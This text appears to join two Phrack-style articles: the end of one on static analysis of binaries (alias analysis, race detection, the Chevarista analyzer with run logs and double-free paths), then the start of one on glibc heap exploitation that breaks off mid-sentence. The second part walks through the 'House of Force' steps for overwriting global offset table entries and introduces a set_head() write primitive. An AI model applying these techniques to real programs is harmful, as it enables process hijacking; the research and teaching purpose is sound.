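 * Classify two pointers from their point-to sets. Bit k of a set is 1
 * when the pointer may reference abstract location k.
 */
alias_t classify_alias(unsigned long pts_a, unsigned long pts_b)
{
    assert(pts_a != 0 && pts_b != 0);   /* both sets must be known */
    if ((pts_a & pts_b) == 0)
        return NO_ALIAS;                /* disjoint sets */
    if (pts_a == pts_b)
        return MUST_ALIAS;              /* identical sets */
    return MAY_ALIAS;                   /* overlapping but different */
}
```

Such a flat encoding says nothing about which program path or context leads to each
location, which is exactly where the difficulty discussed next begins.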


NoAliasing and MustAliasing are quite intuitive. The big job is definitely
the MayAliasing. For instance, 2 pointers might point to the same variable
when executing some program path, but to different variables when executing
another path. An analysis that is capable of making those differences is
called a path-sensitive analysis. Also, for a single program location manipulating
a given variable, the point-to set of the variable can be different depending
on the context (for example : the set of predicates that are true at this moment
of abstract program interpretation). An analysis that can reason on those
differences is called context-sensitive.


It is an open problem in research to find better alias analysis algorithms that scale
to big programs (i.e. with a low computation cost) and that are capable of keeping
sufficient precision to prove security properties. Generally, you can have one,
but not the other. Some analyses are very precise but only work within the boundaries
of a function. Others work in a purely flow-insensitive manner, thus scale to big
programs but are very imprecise. My example analyzer Chevarista implements only
a simple alias analysis, that is very precise but does not scale well to big
programs. For each pointer, it will try to compute its point-to set in the concrete
world by somewhat simulating the computation of pointer arithmetic and looking at
its results from within the analyzer. It is just provided as an example but is
in no way a definitive answer to this problem.


[ c. Hints on detecting race conditions 


Another class of vulnerabilities that we are interested in detecting
automatically are race conditions. Those vulnerabilities require a different
analysis to be discovered, as they relate to a scheduling property : is
it possible that 2 threads get interleaved (a,b,a,b) executions over their
critical sections where they share some variables ? If the variables are
all well locked, interleaved execution won't be a problem anyway. But if
locking is badly handled (as can happen in very big programs such
as Operating Systems), then a scheduling analysis might uncover the
problem.


Which data structure can we use to perform such an analysis ? The approach
of JavaPathFinder [JPF], which is developed at NASA, is to use a scheduling graph.
The scheduling graph is a non-cyclic (without loop) graph, where nodes
represent states of the program and edges represent scheduling
events that preempt the execution of one thread to execute another.


While this approach seems interesting to detect any potential scheduling
path (using again a Depth First Search over the scheduling graph) that
fails to properly lock a variable that is used in multiple different
threads, it seems to be more delicate to apply it when we deal with
more than 2 threads. Each potential node will have as many edges as
there are threads, thus the scheduling graph will grow exponentially
at each scheduling step. We could use a technique called partial
order reduction to represent by a single node a big piece of code
for which all instructions share the same scheduling property (like:
it cannot be interrupted) or the same dataflow property (like: it uses
the same set of variables), thus reducing the scheduling graph to make
it more abstract.
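
To get a feeling for this growth, the following C sketch counts the scheduling paths
between 2 threads, where each thread is a sequence of atomic steps and the scheduler
picks which thread runs next. It is a toy model under our own assumptions (no locks,
no blocking), and the function name is hypothetical:

```c
#include <assert.h>

/*
 * Number of distinct interleavings of two threads having 'a' and 'b'
 * atomic steps left. At each node of the scheduling graph, either
 * thread may be chosen, hence the two recursive branches.
 */
unsigned long count_interleavings(unsigned a, unsigned b)
{
    assert(a + b <= 24);    /* keep the naive recursion cheap */
    if (a == 0 || b == 0)
        return 1;           /* only one thread left: a single path */
    return count_interleavings(a - 1, b) + count_interleavings(a, b - 1);
}
```

Two threads of 4 steps each already give 70 paths. If a reduction manages to merge
those steps into 2 blocks per thread, only 6 paths remain to be explored.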


Again, the chevarista analyzer does not deal with race conditions, but 
other analyzers do and techniques exist to make it possible. Consider 
reading the references for more about this topic. 


[ IV. Chevarista: an analyzer of binary programs


Chevarista is a project for analyzing binary code. In this article, most of
the examples have been given in C or assembly, but Chevarista only analyzes
the binary code, without any information from the source. All it
needs is an entry point to start the analysis, which you can always get
without trouble, for any (working ? ;) binary format like ELF, PE, etc.


Chevarista is a simpler analyzer than everything that was presented in
this article, however it aims at following this model, driven by the successful
results that were obtained using the current tool. In particular, the
intermediate form of Chevarista at the moment is a graph that contains
both data-flow and control-flow information, but with sigma and phi
functions left implicit.


For simplicity, we have chosen to work on SPARC [SRM] binary code, but after
reading this article, you might understand that the representations
used are sufficiently abstract to be used on any architecture. One could
argue that the SPARC instruction set is RISC, and that supporting a CISC architecture
like INTEL, or ARM where most of the instructions are conditional, would be
a problem. You are right to object, because these architectures
require specific features in the architecture-dependent backend of
the decompiler-analyzer. Currently, only the SPARC backend is coded and there
is an empty skeleton for the INTEL architecture [IRM].


What are, in detail, the differences between such architectures ?
They are essentially grouped into a single architecture-dependent component:

The Backend


On INTEL 32-bit processors, each instruction can perform multiple operations.
It is also the case for SPARC, but only when conditional flags are affected
by the result of the operation executed by the instruction. For instance,
a push instruction writes to memory and modifies the stack pointer, and many other
instructions also modify the status flags (eflags register on INTEL), which makes
them very hard to analyze. Many instructions do more than a single operation, thus we
need to translate them into intermediate forms that make those operations more
explicit. If we limit the number of syntactic constructs in that intermediate form, we
are capable of performing architecture-independent analysis much more easily, with
all operations made explicit. The low-level intermediate form of Chevarista
has around 10 "abstract operations" in its IR : Branch, Call, Ternop (that
has an additional field in the structure indicating which arithmetic or
logic operation is performed), Cmp, Ret, Test, Interrupt, and Stop. Additionally,
you have purely abstract operations: FMI (Flag Modifying Instruction), CFI
(Control Flow Instruction), and Invoke (external function calls), which make
the analysis even more generic. Invoke is a kind of statement that
informs the analyzer that it should not try to analyze inside the function being
invoked, but consider those internals as an abstraction. For instance, the types
Alloc, Free, Close are child classes of the Invoke abstract class, which model
the fact that malloc(), free(), or close() are called and that the analyzer should
not try to handle the called code, but consider it as a blackbox. Indeed, finding
allocation bugs does not require analyzing the inside of malloc() or free(). This
would be necessary for automated exploit generation though, but we do not cover this
here.
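
The blackbox treatment of Invoke can be illustrated with a few lines of C. This is
not Chevarista's code (which the article describes in terms of classes): invoke_kind_t
and classify_invoke are hypothetical names, and resolving the name of the called symbol
is assumed to be done elsewhere:

```c
#include <assert.h>
#include <string.h>

/* Hypothetical counterparts of the Alloc, Free and Close Invoke subtypes. */
typedef enum { INV_ALLOC, INV_FREE, INV_CLOSE, INV_OTHER } invoke_kind_t;

/*
 * Map the name of an external function to an abstract event, so that the
 * analyzer records the event instead of entering the callee.
 */
invoke_kind_t classify_invoke(const char *symbol)
{
    assert(symbol != NULL);
    if (strcmp(symbol, "malloc") == 0)
        return INV_ALLOC;
    if (strcmp(symbol, "free") == 0)
        return INV_FREE;
    if (strcmp(symbol, "close") == 0)
        return INV_CLOSE;
    return INV_OTHER;       /* still a blackbox, but with no type-state effect */
}
```

The events produced this way are the kind of input a type-state checker needs:
an allocation, a free, or nothing of interest.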


We make use of the Visitor Design Pattern for architecting the analysis, as presented
in the following paragraph.


[ B. Program transformation & modeling 


The project is organized using the Visitor Design Pattern [DP]. To sum up,
the Visitor Design Pattern allows us to walk on a graph (that is: the intermediate
form representation inside the analyzer) and transform its nodes, which contain
either basic blocs for control flow analysis, or operands for dataflow analysis.
Indeed, the control or data flow links in the graph represent the ancestors /
successors relations between (control flow) blocs or (data flow) variables.
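
A minimal sketch of this walking scheme, written in C with function pointers instead
of classes, could look as follows. All type and function names are hypothetical and
the node kinds are reduced to two; it does not reproduce the real class hierarchy of
the analyzer:

```c
#include <assert.h>
#include <stddef.h>

typedef enum { NODE_BLOCK, NODE_OPERAND, NODE_KINDS } node_kind_t;

typedef struct node {
    node_kind_t  kind;
    struct node *succ[2];   /* successors in the graph, NULL if absent */
    int          visited;
} node_t;

typedef struct visitor {
    /* one handler per node kind; NULL means "use the default visitor" */
    void (*handle[NODE_KINDS])(struct visitor *, node_t *);
    void (*fallback)(struct visitor *, node_t *);
    int  count;             /* state owned by this particular visitor */
} visitor_t;

/* Depth-first walk: dispatch on the node kind, then visit the successors. */
void visit(visitor_t *v, node_t *n)
{
    size_t i;

    if (n == NULL || n->visited)
        return;
    n->visited = 1;
    assert(n->kind < NODE_KINDS);
    if (v->handle[n->kind] != NULL)
        v->handle[n->kind](v, n);
    else if (v->fallback != NULL)
        v->fallback(v, n);
    for (i = 0; i < 2; i++)
        visit(v, n->succ[i]);
}

/* Example default handler: only counts the nodes it is given. */
void count_node(visitor_t *v, node_t *n)
{
    (void)n;
    v->count++;
}
```

A visitor that only sets the fallback to count_node will count every reachable node
once, even when the graph contains cycles, thanks to the visited flag.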


The project is organized as follows:

  visitor  : The default visitor. When the graph contains nodes whose
             type is not handled by the current visitor, it is this visitor that
             performs the operation. The default visitor is the root class of
             the Visitor class hierarchy.

  arch     : The architecture backend. Currently SPARC32/64 is fully
             provided and the INTEL backend is just a skeleton. The
             whole proof of concept was written on SPARC for simplicity. This
             part also includes the generic code for dataflow and control flow
             computations.

  graph    : It contains all the API for constructing graphs directly in
             the intermediate language. It also defines all the abstract
             instructions (and the "more" abstract instructions as presented
             previously).

  gate     : This is the interprocedural analysis visitor. Dataflow and
             control flow links are propagated interprocedurally in that visitor.
             Additionally, a new type "Continuation" abstracts different kinds of
             control transfer (Branch, Call, Ret, etc), which makes the analysis even
             easier to perform after this transformation.

  alias    : Performs a basic point-to analysis to determine obvious aliases
             between variables before checking for vulnerabilities. This analysis is
             exact and thus does not scale to big programs. There are many hours of
             good reading and hacking to improve this visitor, which would make the
             whole analyzer much more interesting in practice on big programs.

  heap     : This visitor does not perform a real transformation, but a simplistic
             graph walk to detect anomalies on the data flow graph. Double frees,
             memory leaks, and such, are implemented in that visitor.

  print    : The Print visitor simply prints the intermediate forms after each
             transformation in a text file.

  printdot : Prints in a visual manner (dot/graphviz) the internal representation.
             This can also be called after each transformation, but we currently call
             it just at the end of the analysis.


Additionally, another transformation has been started but is still a work in progress:

  symbolic : Performs translation towards more symbolic intermediate forms (such as
             SSA and SSI) and (fails to) structure the control flow graphs into a graph
             of zones. This visitor is a work in progress, but it is made part of this
             release as Chevarista will be discontinued in its current form, to be
             reimplemented in the ERESI [RSI] language instead of C++.


          |              |        |        |
          | Architecture |        |        |
    ----> |              |  --->  |        |  ---> Results
          |   Backend    |        |        |
          |              |        |        |


[ C. Vulnerability checking 


Chevarista is used as follows in this demo framework. A fairly big testsuite of binary
files is provided in the package and the analysis is performed on it. In only a couple
of seconds, all the analysis is finished:

# We execute chevarista on testsuite binary 34
$ autonomous/chevarista ../testsuite/34.elf


:/\ Chevarista standalone version /\:.
Detected SPARC


24 


Chevarista IS STARTING 

Calling sparc64_IDG 

Created IDG 

SPARC IDG New bloc at addr 0000000000100A34 
SPARC IDG New bloc at addr 00000000002010A0 
[!] Reached Invoke at addr 00000000002010A4 
SPARC IDG New bloc at addr 0000000000100A44 
Cflow reference to 00100A50 

Cflow reference from 00100A48 

Cflow reference from 00100C20 

SPARC IDG New bloc at addr 0000000000100A4C
SPARC IDG New bloc at addr 0000000000100A58 
SPARC IDG New bloc at addr 0000000000201080 
[!] Reached Invoke at addr 0000000000201084 
SPARC IDG : New bloc at addr 0000000000100A80 
SPARC IDG New bloc at addr 0000000000100AA4 
SPARC IDG New bloc at addr 0000000000100AD0 
SPARC IDG New bloc at addr 0000000000100AF4
SPARC IDG New bloc at addr 0000000000100B10 
SPARC IDG New bloc at addr 0000000000100B70 
SPARC IDG New bloc at addr 0000000000100954 
Cflow reference to : 00100970 

Cflow reference from 00100968 

Cflow reference from 00100A1C

SPARC IDG New bloc at addr 000000000010096C 
SPARC IDG New bloc at addr 0000000000100A24 
Cflow reference to : 00100A2C

Cflow reference from 00100A24

Cflow reference from 00100A08 

SPARC IDG : New bloc at addr 0000000000100A28 
SPARC IDG New bloc at addr 0000000000100980 
SPARC IDG New bloc at addr 0000000000100A10 
SPARC IDG New bloc at addr 00000000001009C4 
SPARC IDG New bloc at addr 0000000000100B88 
SPARC IDG New bloc at addr 0000000000100BA8 
SPARC IDG New bloc at addr 0000000000100BC0
SPARC IDG New bloc at addr 0000000000100BE0 
SPARC IDG : New bloc at addr 0000000000100BF8
SPARC IDG : New bloc at addr 0000000000100C14 
SPARC IDG : New bloc at addr 00000000002010C0 
[!] Reached Invoke at addr 00000000002010C4 
SPARC IDG : New bloc at addr 0000000000100C20 
SPARC IDG New bloc at addr 0000000000100C04 
SPARC IDG New bloc at addr 0000000000100910 
SPARC IDG New bloc at addr 0000000000201100 
[!] Reached Invoke at addr 0000000000201104 
SPARC IDG New bloc at addr 0000000000100928 
SPARC IDG New bloc at addr 000000000010093C 
SPARC IDG New bloc at addr 0000000000100BCC 
SPARC IDG New bloc at addr 00000000001008E0 
SPARC IDG New bloc at addr 00000000001008F4
SPARC IDG New bloc at addr 0000000000100900 
SPARC IDG New bloc at addr 0000000000100BD8 
SPARC IDG New bloc at addr 0000000000100B94 
SPARC IDG New bloc at addr 00000000001008BC 
SPARC IDG New bloc at addr 00000000001008D0 
SPARC IDG New bloc at addr 0000000000100BA0 
SPARC IDG New bloc at addr 0000000000100B34 
SPARC IDG New bloc at addr 0000000000100B58 
Cflow reference to : 00100B74 

Cflow reference from 00100B6C

Cflow reference from 00100B2C 

Cflow reference from 00100B50 

SPARC IDG New bloc at addr 0000000000100B04 
SPARC IDG New bloc at addr 00000000002010E0 
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loc at addr QOO0O0Q0000000100AE 
loc at addr 0000000000100A98 
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Intraprocedural Dependance Graph has been built succesfully! 
A number of 47 blocs has been statically traced for flow-types 


[+] IDG built 
Scalar parameter REPLACED with name 
Backward dataflow analysis VAR 
Scalar parameter REPLACED with name 
Backward dataflow analysis VAR 
Scalar parameter REPLACED with name 
Backward dataflow analysis VAR 
Backward dataflow analysis VAR 
Return-Value REPLACED with name = %i 
Backward dataflow analysis VAR 
Backward dataflow analysis VAR 
Return-Value REPLACED with name = %i 
Backward dataflow analysis VAR 
Backward dataflow analysis VAR [%fp 
Scalar parameter REPLACED with name 
Backward dataflow analysis VAR 
Scalar parameter REPLACED with name 
Backward dataflow analysis VAR 
Scalar parameter REPLACED with name 
Backward dataflow analysis VAR 
Scalar parameter REPLACED with name 
Backward dataflow analysis VAR 
Scalar parameter REPLACED with name 
Backward dataflow analysis VAR 
Scalar parameter REPLACED with name 
Backward dataflow analysis VAR 
Backward dataflow analysis VAR 
Return-Value REPLACED with name = $i 
Backward dataflow analysis VAR 
Backward dataflow analysis VAR [%fp 
Backward dataflow analysis VAR [%fp 
Backward dataflow analysis VAR [%fp 
Backward dataflow analysis VAR 
Return-Value REPLACED with name = $i 
Backward dataflow analysis VAR 
Backward dataflow analysis VAR [%fp 
Backward dataflow analysis VAR [%fp 
Backward dataflow analysis VAR [%fp 
Backward dataflow analysis VAR [%fp 
Backward dataflow analysis VAR [%fp 
Backward dataflow analysis VAR [%fp 
Backward dataflow analysis VAR [%fp 
Backward dataflow analysis VAR 
Backward dataflow analysis VAR 
Backward dataflow analysis VAR 
Scalar parameter REPLACED with name 
Backward dataflow analysis VAR 
Scalar parameter REPLACED with name 
Backward dataflow analysis VAR 
Backward dataflow analysis VAR [%fp 
Backward dataflow analysis VAR [%fp 
[+] GateVisitor finished
[+] AliasVisitor finished
Entered Node Splitting for Node id 
Entered Node Splitting for Node id 
Entered Node Splitting for Node id 
Entered Node Splitting for Node id 
Entered Node Splitting for Node id 
Entered Node Splitting for Node id 
Entered Node Splitting for Node id 


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+] SymbolicVisitor finished 


Entering DotVisitor 

+ SESE visited 

+ SESE visited 

SESE already visited 

SESE already visited 

SESE visited 

SESE visited 

* SESE already visited 

* SESE already visited 

SESE already visited

Node pointed by (nil) is NOT a SESE
SESE visited

SESE already visited

SESE already visited

SESE already visited

Print*Visitors finished 


+ 


Starting HeapVisitor 
Double Free found 

Double Free found 

Double malloc 

[+] Heap visitor finished 


[+] Chevarista has finished 


The run was performed in less than 2 seconds and multiple vulnerabilities were
found in the binary file (2 double frees and one memory leak, as indicated
by the last lines of the output). This is pretty useless without more
information, which brings us to the results.


[ D. Vulnerable paths extraction 


Once the analysis has been performed, we can simply check what the vulnerable
paths were:

~/IDA/sdk/plugins/chevarista/sre $ ls tmp/
cflow.png chevarista.alias chevarista.buchi chevarista.dflow.dot \
chevarista.dot chevarista.gate chevarista.heap chevarista.lir \
chevarista.symbolic dflow.png


Each visitor (transformation) outputs the complete program in each intermediate
form. The most interesting thing is the output of the heap visitor, which gives
us exactly the vulnerable paths:

~/IDA/sdk/plugins/chevarista/sre $ cat tmp/chevarista.heap


[%fp + 7e7]
[%fp + 7df]
[%i0]

***********************************
*                                 *
* Multiple free of same variables *
*                                 *
***********************************

path to free 1

******************
@0x2010a4 (0) {S} 32: inparam_%i0 = Alloc(inparam_%i0)
@0x100a44 (4) {S} 46: %g1 = outparam_%o0
@0x100a48 (8) {S} 60: local_%fp$0x7e7 = %g1
@0x100bcc (8) {S} 1770: outparam_%o0 = local_%fp$0x7e7
@0x1008e4 (8) {S} 1792: local_%fp$0x87f = inparam_%i0
@0x1008f4 (8) {S} 1828: outparam_%o0 = local_%fp$0x87f
@0x2010c4 (0) {S} 1544: inparam_%i0 = Free(inparam_%i0)
******************

path to free 2

******************
@0x2010a4 (0) {S} 32: inparam_%i0 = Alloc(inparam_%i0)
@0x100a44 (4) {S} 46: %g1 = outparam_%o0
@0x100a48 (8) {S} 60: local_%fp$0x7e7 = %g1
@0x100b58 (8) {S} 2090: %g1 = local_%fp$0x7e7
@0x100b5c (8) {S} 2104: local_%fp$0x7d7 = %g1
@0x100b68 (8) {S} 2146: %g1 = local_%fp$0x7d7
@0x100b6c (8) {S} 2160: local_%fp$0x7df = %g1
@0x100c14 (8) {S} 1524: outparam_%o0 = local_%fp$0x7df
@0x2010c4 (0) {S} 1544: inparam_%i0 = Free(inparam_%i0)
******************

path to free 3

******************
@0x2010a4 (0) {S} 32: inparam_%i0 = Alloc(inparam_%i0)
@0x100a58 (4) {S} 96: %g1 = outparam_%o0
@0x100a5c (8) {S} 110: local_%fp$0x7df = %g1
@0x100c14 (8) {S} 1524: outparam_%o0 = local_%fp$0x7df
@0x2010c4 (0) {S} 1544: inparam_%i0 = Free(inparam_%i0)
******************

path to free 4

******************
@0x2010a4 (0) {S} 32: inparam_%i0 = Alloc(inparam_%i0)
@0x100a58 (4) {S} 96: %g1 = outparam_%o0
@0x100a5c (8) {S} 110: local_%fp$0x7df = %g1
@0x100b60 (8) {S} 2118: %g1 = local_%fp$0x7df
@0x100b64 (8) {S} 2132: local_%fp$0x7e7 = %g1
@0x100bcc (8) {S} 1770: outparam_%o0 = local_%fp$0x7e7
@0x1008e4 (8) {S} 1792: local_%fp$0x87f = inparam_%i0
@0x1008f4 (8) {S} 1828: outparam_%o0 = local_%fp$0x87f
@0x2010c4 (0) {S} 1544: inparam_%i0 = Free(inparam_%i0)


~/IDA/sdk/plugins/chevarista/sre $ 


As you can see, we now have the complete vulnerable paths where multiple
frees are done in sequence over the same variables. In this example, 2
double frees were found and one memory leak, for which the path to free
is not given, since there is none (it is a memory leak :).


A very useful trick was also to give more refined types to operands. For
instance, local variables can be identified pretty easily if they are
accessed through the stack pointer. Function parameters and results
can also be found easily by inspecting the use of %i and %o registers
(for the SPARC architecture only).


[ IV. Future work : Refinement


The final step of the analysis is refinement [CEGF]. Once we have analyzed
a program for vulnerabilities and extracted the path of the program
that appears to lead to a corruption, we need to recreate the real conditions
that trigger the bug in reality, and not in an abstract description of the
program, as we did in this article. For this, we need to execute the program
for real (this time), and try to feed it with data deduced from the
conditional predicates found on the abstract path that leads to
the potential vulnerability. The input values that we give to the program
must pass all the tests that are on the way to reaching the bug in the real
world.


Not a lot of projects use this technique. Determining exactly how to be the
most precise while still scaling to very big programs is quite recent research.
The answer is that precision can be requested on demand, using an iterative
procedure as done in the BLAST [BMC] model checker. Even advanced abstract
interpretation frameworks [ASA] do not have refinement yet: some would argue
it's too computationally expensive to refine abstractions and it's better to
couple weaker abstractions together than to try to refine a single "perfect"
one.


[ V. Related Work 


Almost no project about this topic has been initiated by the underground. The
work of Nergal on finding integer overflows in Win32 binaries is the first
notable attempt to mix research knowledge and reverse engineering knowledge,
using a decompiler and a model checker. The work from Halvar Flake in the
framework of BinDiff/BinNavi [BN] is interesting but has so far served a
different purpose than finding vulnerabilities in binary code.


From a more theoretical point of view, the interested reader is invited to look
at the references to find many of the major readings in the field of program
analysis. Automated reverse engineering, or decompiling, has been studied in
the last 10 years only and the gap is still not completely filled between those
2 worlds. This article tried to go in that direction by introducing formal
techniques using a completely informal view.


Mostly 2 different theories can be studied: Model Checking [MC] and Abstract
Interpretation [AI]. Model Checking generally involves temporal logic properties
expressed in languages such as LTL, CTL, or CTL* [TL]. Those properties are then
translated to automata. Traces are then used as words, and an automaton that
does not recognize a given trace means that the trace breaks a property. In
practice, the formula is negated, so that the resulting automaton only
recognizes the traces leading to vulnerabilities, which sounds like a more
natural approach for detecting vulnerabilities.
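As an illustration of the negated-property idea, the sketch below encodes a tiny automaton that accepts only traces containing a double free. It is a toy under stated assumptions, not the Chevarista implementation: a trace is a string of events for one variable, where 'A' stands for an allocation and 'F' for a free, and all names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>

/* States of the toy automaton tracking one heap variable. */
enum heap_state {
    ST_UNALLOCATED,
    ST_ALLOCATED,
    ST_FREED,
    ST_DOUBLE_FREE   /* accepting state: the property is violated */
};

/* One transition. 'A' = allocation event, 'F' = free event.
 * Any other event leaves the state unchanged. */
static enum heap_state heap_step(enum heap_state s, char ev)
{
    if (s == ST_DOUBLE_FREE)
        return s;                       /* accepting state is absorbing */
    switch (ev) {
    case 'A':
        return ST_ALLOCATED;
    case 'F':
        /* A free seen while already freed is the violation.
         * For simplicity, a free before any allocation just moves
         * to the freed state. */
        return (s == ST_FREED) ? ST_DOUBLE_FREE : ST_FREED;
    default:
        return s;
    }
}

/* Returns 1 if the automaton accepts the trace (a double free exists). */
static int trace_has_double_free(const char *trace)
{
    enum heap_state s = ST_UNALLOCATED;
    size_t i;

    for (i = 0; trace[i] != '\0'; i++)
        s = heap_step(s, trace[i]);
    return s == ST_DOUBLE_FREE;
}
```

The trace "AFF" is accepted, while "AF" and "AFAF" are rejected: only the words of the "bad" language are recognized.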


Abstract interpretation [ASA] is about finding the most adequate system
representation for allowing the checking to be computable in a reasonable time
(else we might end up doing an "exhaustive bruteforce checking" if we try to
check all the potential behaviors of the program, which can btw be infinite).
By reasoning in an abstract domain, we make the state space finite (or at least
reduced, compared to the real state space), which makes our analysis tractable.
The stronger the abstractions are, the faster and less precise our analysis
will be. The whole job consists in finding the best (when possible) or an
approximate abstraction that is precise enough and strong enough to give
results in seconds or minutes.


In this article, we have presented some abstractions without naming them
explicitly (interval abstraction, trace abstraction, predicate abstraction ...).
You can also design product domains, where multiple abstractions are considered
at the same time, which gives the best results, but for which automated
procedures require more work to be defined.


[ VI. Conclusion


I hope to have encouraged the underground community to think about using more
formal techniques for the discovery of bugs in programs. I do not include this
dream automated tool, but a simpler one that shows this approach to be
rewarding, and I look forward to seeing more automated tools from the reverse
engineering community in the future. The chevarista analyzer will not be
continued as is, but is being reimplemented in a different analysis
environment, on top of a dedicated language for reverse engineering and
decompilation of machine code. Feel free to hack inside the code; you don't
have to send me patches as I do not use this tool anymore for my own
vulnerability auditing. I do not wish to encourage script kiddies into using
such tools, as they will not know how to exploit the results anyway (no, this
does not give you a root shell).


[ VII. Greetings


Why should every single Phrack article have greetings ? 


The persons who enjoyed Chevarista know who they are. 
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http://eresi.asgardlabs.org 


[PA] Automatic Predicate Abstraction of C Programs
T Ball, R Majumdar, T Millstein, SK Rajamani
ACM SIGPLAN Notices 2001


[IRM] INTEL reference manual
http://www.intel.com/design/pentium4/documentation.htm


[SRM] SPARC reference manual
http://www.sparc.org/standards/


[LAT] Wikipedia : lattice
http://en.wikipedia.org/wiki/Lattice_%28order%29


[DDA] Data Dependence Analysis of Assembly Code
ftp://ftp.inria.fr/INRIA/publication/publi-pdf/RR/RR-3764.pdf


[DP] Design Patterns : Elements of Reusable Object-Oriented Software
Erich Gamma, Richard Helm, Ralph Johnson & John Vlissides


[ IX. The code


Feel free to contact me to get the code. It is not included
in this article but I will provide it on request if you show
an interest.
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--[{ 1 - Introduction 


Many papers have been published in the past describing techniques on how to
take advantage of the in-band memory management in the GNU C Library
implementation. A first technique was introduced by Solar Designer in his
security advisory on a flaw in the Netscape browser[1]. Since then, many
improvements have been made by many different individuals ([2], [3], [4],
[5], [6] just to name a few). However, there is always one situation that
gives a lot more trouble than others. Anyone who has already tried to take
advantage of that situation will agree. How to take control of a vulnerable
program when the only critical information that you can overwrite is the
header of the wilderness chunk?


The set_head technique is a new way to obtain a "write almost 4 arbitrary 
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bytes to almost anywhere" primitive. It was born because of a bug in the 
File(1) utility that the author was unable to exploit with existing 
techniques. 


This paper will present the details of the technique. Also, it will show
you how to practically apply this technique to other exploits. The
limitations of the technique will also be presented. Finally, some
examples will be shown to better understand the various aspects of the
technique.


--[ 2 - The set_head() technique


Most of the time, people who write exploits using malloc techniques are not
aware of the difficulties that the wilderness chunk implies until they face
the problem. It is only at this exact time that they realize how the known
techniques (i.e. unlink, etc.) have no effect in this particular context.


As MaXX once said [3]: "The wilderness chunk is one of the most dangerous
opponents of the attacker who tries to exploit heap mismanagement. Because
this chunk of memory is handled specially by the dlmalloc internal
routines, the attacker will rarely be able to execute arbitrary code if
they solely corrupt the boundary tag associated with the wilderness chunk."


----[ 2.1 - A look at the past - "The House of Force" technique 


To better understand the details of the set_head() technique explained in 
this paper, it would be helpful to first understand what has already been 
done on the subject of exploiting the top chunk. 


This is not the first time that the exploitation of the wilderness chunk 
has been specifically targeted. The pioneer of this type of exploitation 
is Phantasmal Phantasmagoria. 


He first wrote an article entitled "Exploiting the wilderness" about it in 
2004. Details of this technique are out of scope for the current paper, 
but you can learn more about it by reading his paper [5]. 


He gave a second try at exploiting the wilderness in his excellent paper 
"Malloc Maleficarum" [4]. He named his technique "The House of Force". To 
better understand the set_head() technique, the "House of Force" is 
described below. 


The idea behind "The House of Force" is quite simple but there are specific 
steps that need to be followed. Below, you will find a brief summary of 
all the steps. 


Step one: 


The first step in the "House of Force" consists in overflowing the size
field of the top chunk to make the malloc library think it is bigger than
it actually is. The preferred new size of the top chunk should be
0xffffffff. Below is an ASCII graphic of the memory layout at the time
of the overflow. Notice that the location of the top chunk is somewhere in
the heap.


0xbfffffff -> +-----------------+
              |                 |
              |      stack      |
              |                 |
              :                 :
              :                 :
              |                 |
              |      heap       |<--- Top chunk
              |                 |
              +-----------------+
              |  global offset  |
              |      table      |
              +-----------------+
              |                 |
              |      text       |
              |                 |
0x08048000 -> +-----------------+


Step two: 


After this, a call to malloc with a user-supplied size should be issued. 
With this call, the top chunk will be split in two parts. One part will be 
returned to the user, and the other part will be the remainder chunk (the 
top chunk). 


The purpose of this step is to move the top chunk right before a global 
offset table entry. The new location of the top chunk is the sum of the 
current address of the top chunk and the value of the malloc call. This 
sum is done with the following line of code: 


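--[ From malloc.c


remainder = chunk_at_offset (victim, nb);


After the malloc call, the memory layout should be similar to the
representation below:


0xbfffffff -> +-----------------+
              |                 |
              |      stack      |
              |                 |
              :                 :
              :                 :
              |                 |
              |      heap       |
              |                 |
              +-----------------+
              |  global offset  |
              |      table      |
              +-----------------+<--- Top chunk
              |                 |
              |      text       |
              |                 |
0x08048000 -> +-----------------+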
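The pointer arithmetic of step two can be sketched as follows. This is a minimal illustration under assumptions: addresses are modeled as 32-bit unsigned integers so that additions wrap around as they would on the 32-bit target, and the function names are hypothetical (only chunk_at_offset() exists in malloc.c, as a macro that adds an offset to a chunk pointer).

```c
#include <assert.h>
#include <stdint.h>

/* Integer model of chunk_at_offset(): chunk address plus offset,
 * wrapping modulo 2^32 like pointer arithmetic on a 32-bit target. */
static uint32_t chunk_at_offset32(uint32_t chunk, uint32_t offset)
{
    return chunk + offset;
}

/* Hypothetical helper: normalized size 'nb' that moves the top chunk
 * from 'top' to 'target'. When the target lies below the top chunk,
 * the result is a very large value that relies on the wrap-around. */
static uint32_t nb_to_reach(uint32_t top, uint32_t target)
{
    return target - top;
}
```

For example, with a top chunk at 0x0804a008 and a target at 0x08049ff0 (both made-up addresses), nb_to_reach() yields 0xffffffe8, and adding that value to the top chunk address wraps around to the target. Such a huge request is only accepted because the size of the top chunk was overwritten in step one.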

Step three:


Finally, another call to malloc needs to be done. This one needs to be
large enough to trigger the top chunk code. If the user has some sort of
control over the content of this buffer, he can then overwrite entries
inside the global offset table and seize control of the process.


Look at the following representation for the current memory layout at the
time of the allocation:


0xbfffffff -> +-----------------+
              |                 |
              |      stack      |
              |                 |
              :                 :
              :                 :
              |                 |
              |      heap       |<---- Top chunk
              +-----------------+
              |  global offset  |<---- Allocated memory
              |      table      |
              +-----------------+
              |                 |
              |      text       |
              |                 |
0x08048000 -> +-----------------+


----[ 2.2 - The basics of set_head() 


Now that the basic review of the "House of Force" technique is done, let's
look at the set_head() technique. The basic idea behind this technique is
to use the set_head() macro to write almost four arbitrary bytes to almost
anywhere in memory. This macro is normally used to set the value of the
size field of a memory chunk to a specific value. Let's have a peek at the
code:


--[ From malloc.c: 


/* Set size/use field */ 
#define set_head(p, s) ((p)->size = (s)) 


This line is very simple to understand. It takes the memory chunk 'p'
and replaces the content of its size field with the value of the variable 's'.
If the attacker has control of those two parameters, it may be possible to
modify the content of an arbitrary memory location with a value that he
controls.
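To make the effect of the macro concrete, here is a minimal sketch. The two-field struct only mirrors the start of a dlmalloc chunk header (prev_size followed by size); the names chunk_sketch and set_head_demo are illustrative assumptions, not code from malloc.c.

```c
#include <assert.h>
#include <stddef.h>

/* Simplified chunk header: only the first two fields of a chunk. */
struct chunk_sketch {
    size_t prev_size;  /* size of the previous chunk, if it is free */
    size_t size;       /* size of this chunk, low bits hold flags   */
};

/* Same shape as the macro quoted from malloc.c. */
#define set_head(p, s) ((p)->size = (s))

/* Hypothetical helper: apply set_head() and return the stored value. */
static size_t set_head_demo(struct chunk_sketch *p, size_t s)
{
    set_head(p, s);
    return p->size;
}
```

Only the size field is touched; prev_size keeps its previous value. Whoever chooses both the chunk pointer and the size value therefore chooses where a machine word is written and what it contains.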


To trigger the particular call to set_head() that could lead to this 
